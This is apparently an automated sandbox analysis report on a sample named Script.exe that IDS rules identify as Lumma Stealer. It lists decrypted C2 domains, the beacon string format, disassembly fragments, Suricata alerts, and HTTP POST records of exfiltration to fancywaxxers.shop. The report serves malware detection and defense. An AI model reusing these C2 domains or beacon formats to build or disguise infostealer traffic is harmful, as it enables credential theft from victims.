Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: rabidcowse.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: noisycuttej.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: framekgirus.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: wholersorie.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: nearycrepso.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: fancywaxxers.shop |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0 |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5 |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton: |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory: |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: - |
Source: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: yau6Na--6331801298 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov edx, ecx | 2_2_0043180D |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 0E4A4AE9h | 2_2_0040E9F8 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-14h] | 2_2_00430995 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 2_2_00442B70 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov word ptr [ebp+00h], ax | 2_2_0040C3E0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov ecx, eax | 2_2_0043BD30 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000BBh] | 2_2_0040CECB |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000298h] | 2_2_004156D0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+000001DFh] | 2_2_004156D0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-4ADCAC34h] | 2_2_0040A843 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_00423060 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov dword ptr [ebp-28h], eax | 2_2_0042C01F |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+edx+4F334F6Fh] | 2_2_0042C01F |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-68B18956h] | 2_2_0040B0F0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h | 2_2_0043C880 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2D14B172h] | 2_2_0042F973 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then push eax | 2_2_0044091F |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov word ptr [ecx], dx | 2_2_00416F52 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov word ptr [ecx], dx | 2_2_00416F52 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 2_2_0041FA00 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h | 2_2_0042B200 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov eax, dword ptr [edi+0Ch] | 2_2_00402220 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov byte ptr [esi], dl | 2_2_0042F230 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then push ebx | 2_2_0043CAD0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp esi, edx | 2_2_0043CAD0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 0E4A4AE9h | 2_2_0040EAFB |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov edi, eax | 2_2_00409320 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov ecx, eax | 2_2_00409320 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0041B320 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 2_2_0042E3E0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 2_2_00418BF1 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0150E4D7h] | 2_2_00418BF1 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00414BF0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_00414BF0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 53585096h | 2_2_00414BF0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov ebp, dword ptr [esp+04h] | 2_2_00414BF0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then jmp ecx | 2_2_0040EB9A |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_00419C50 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov ecx, eax | 2_2_0041ACF9 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_00439480 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042FC92 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 13884179h | 2_2_0043F540 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov ebx, edx | 2_2_00429550 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov byte ptr [esi], al | 2_2_0042F55A |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp ah, 0000002Eh | 2_2_00429570 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov byte ptr [edx], cl | 2_2_00429570 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-28C59510h] | 2_2_0041C500 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 2_2_004195CF |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0150E4D7h] | 2_2_004195CF |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov byte ptr [esi], al | 2_2_0042F59A |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then jmp eax | 2_2_0040ADB0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov word ptr [esi], ax | 2_2_0041CDB0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov dword ptr [edi], F073F2F5h | 2_2_0040B651 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov dword ptr [edi], F073F2F5h | 2_2_0040B651 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h | 2_2_0042B612 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_0042CE20 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+01h] | 2_2_0041FE30 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov dword ptr [esp], eax | 2_2_0041D6C0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then test esi, esi | 2_2_0043CEC0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov ecx, eax | 2_2_00441E80 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx edx, byte ptr [edi+ecx-53h] | 2_2_0040B6AD |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov eax, ecx | 2_2_0041BEB1 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0041BEB1 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 2_2_00428740 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov word ptr [ecx], dx | 2_2_00416F52 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov word ptr [ecx], dx | 2_2_00416F52 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov word ptr [eax], dx | 2_2_0041870B |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-3EEFCD92h] | 2_2_0043FF10 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h | 2_2_0043F710 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then mov esi, dword ptr [0044AB30h] | 2_2_00430FD8 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 2_2_00407790 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 2_2_00407790 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 2_2_0041F790 |
Source: Network traffic | Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.5:50187 -> 1.1.1.1:53 |
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49719 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49721 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49720 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49715 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49723 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49724 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49722 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49717 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49715 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49717 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49717 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49722 -> 104.21.80.1:443 |
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49724 -> 104.21.80.1:443 |
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop |
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fancywaxxers.shop |
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E1QIVYDQY8BRGUDGLTCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12846Host: fancywaxxers.shop |
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D9L41FOWJUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: fancywaxxers.shop |
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0YTF4JD3OGNZFOCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20560Host: fancywaxxers.shop |
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=857CJA9RMRQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1222Host: fancywaxxers.shop |
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6VMVRVQYONVT1LLEUWLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568902Host: fancywaxxers.shop |
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fancywaxxers.shop |
Source: Script.exe | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01 |
Source: Script.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0 |
Source: Script.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C |
Source: Script.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: Script.exe | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0 |
Source: Script.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S |
Source: Script.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 |
Source: Script.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0 |
Source: Script.exe | String found in binary or memory: http://ocsp.digicert.com0 |
Source: Script.exe | String found in binary or memory: http://ocsp.digicert.com0A |
Source: Script.exe | String found in binary or memory: http://ocsp.entrust.net02 |
Source: Script.exe | String found in binary or memory: http://ocsp.entrust.net03 |
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net |
Source: Script.exe | String found in binary or memory: http://www.digicert.com/CPS0 |
Source: Script.exe | String found in binary or memory: http://www.entrust.net/rpa03 |
Source: Script.exe, 00000002.00000002.3253797815.0000000003DE2000.00000004.00000800.00020000.00000000.sdmp, Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/ |
Source: Script.exe, 00000002.00000002.3253212983.000000000162C000.00000004.00000020.00020000.00000000.sdmp, Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/api |
Source: Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/apiT |
Source: Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/apiY |
Source: Script.exe, 00000002.00000002.3253312879.000000000165B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/m |
Source: Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/t |
Source: Script.exe | String found in binary or memory: https://www.entrust.net/rpa0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720 |
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00412800 | 2_2_00412800 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043180D | 2_2_0043180D |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004110D7 | 2_2_004110D7 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00429080 | 2_2_00429080 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00408A60 | 2_2_00408A60 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043BAC0 | 2_2_0043BAC0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0040DB46 | 2_2_0040DB46 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00422350 | 2_2_00422350 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00442C50 | 2_2_00442C50 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043BD30 | 2_2_0043BD30 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004435F0 | 2_2_004435F0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004156D0 | 2_2_004156D0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00425F4E | 2_2_00425F4E |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00436869 | 2_2_00436869 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043D070 | 2_2_0043D070 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00443000 | 2_2_00443000 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00442000 | 2_2_00442000 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0042C01F | 2_2_0042C01F |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0040B0F0 | 2_2_0040B0F0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043C880 | 2_2_0043C880 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043608B | 2_2_0043608B |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043108D | 2_2_0043108D |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00427E78 | 2_2_00427E78 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00403950 | 2_2_00403950 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041C163 | 2_2_0041C163 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043B170 | 2_2_0043B170 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0044197F | 2_2_0044197F |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00442100 | 2_2_00442100 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041C908 | 2_2_0041C908 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00439916 | 2_2_00439916 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004179EC | 2_2_004179EC |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00406180 | 2_2_00406180 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004069B0 | 2_2_004069B0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004421B0 | 2_2_004421B0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004311BC | 2_2_004311BC |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00442240 | 2_2_00442240 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00416F52 | 2_2_00416F52 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0042AA7E | 2_2_0042AA7E |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0042B200 | 2_2_0042B200 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041D224 | 2_2_0041D224 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041D237 | 2_2_0041D237 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00409AD0 | 2_2_00409AD0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041DAD0 | 2_2_0041DAD0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043CAD0 | 2_2_0043CAD0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00422AA0 | 2_2_00422AA0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041AAB0 | 2_2_0041AAB0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004432B0 | 2_2_004432B0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00405B60 | 2_2_00405B60 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00402B70 | 2_2_00402B70 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00404300 | 2_2_00404300 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00426B30 | 2_2_00426B30 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043B3D0 | 2_2_0043B3D0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00414BF0 | 2_2_00414BF0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0042EBA0 | 2_2_0042EBA0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00419C50 | 2_2_00419C50 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00433C64 | 2_2_00433C64 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00431C20 | 2_2_00431C20 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0040F430 | 2_2_0040F430 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00411CC5 | 2_2_00411CC5 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004124DD | 2_2_004124DD |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041ACF9 | 2_2_0041ACF9 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00408D50 | 2_2_00408D50 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00429550 | 2_2_00429550 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00426570 | 2_2_00426570 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00429570 | 2_2_00429570 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00406520 | 2_2_00406520 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004425C0 | 2_2_004425C0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041E5D0 | 2_2_0041E5D0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004095E0 | 2_2_004095E0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00425DE0 | 2_2_00425DE0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043559A | 2_2_0043559A |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00427E78 | 2_2_00427E78 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041D6C0 | 2_2_0041D6C0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041DED0 | 2_2_0041DED0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00434ED0 | 2_2_00434ED0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00441ED0 | 2_2_00441ED0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0042A6E9 | 2_2_0042A6E9 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00404E80 | 2_2_00404E80 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_004306B1 | 2_2_004306B1 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00428740 | 2_2_00428740 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00402F50 | 2_2_00402F50 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00416F52 | 2_2_00416F52 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00436F50 | 2_2_00436F50 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00434771 | 2_2_00434771 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041870B | 2_2_0041870B |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00439F15 | 2_2_00439F15 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0041A7D0 | 2_2_0041A7D0 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00427780 | 2_2_00427780 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0043F780 | 2_2_0043F780 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0042078E | 2_2_0042078E |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_00407790 | 2_2_00407790 |
Source: C:\Users\user\Desktop\Script.exe | Code function: 2_2_0040DF91 | 2_2_0040DF91 |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Script.exe | Section loaded: windows.storage.dll | Jump to behavior |
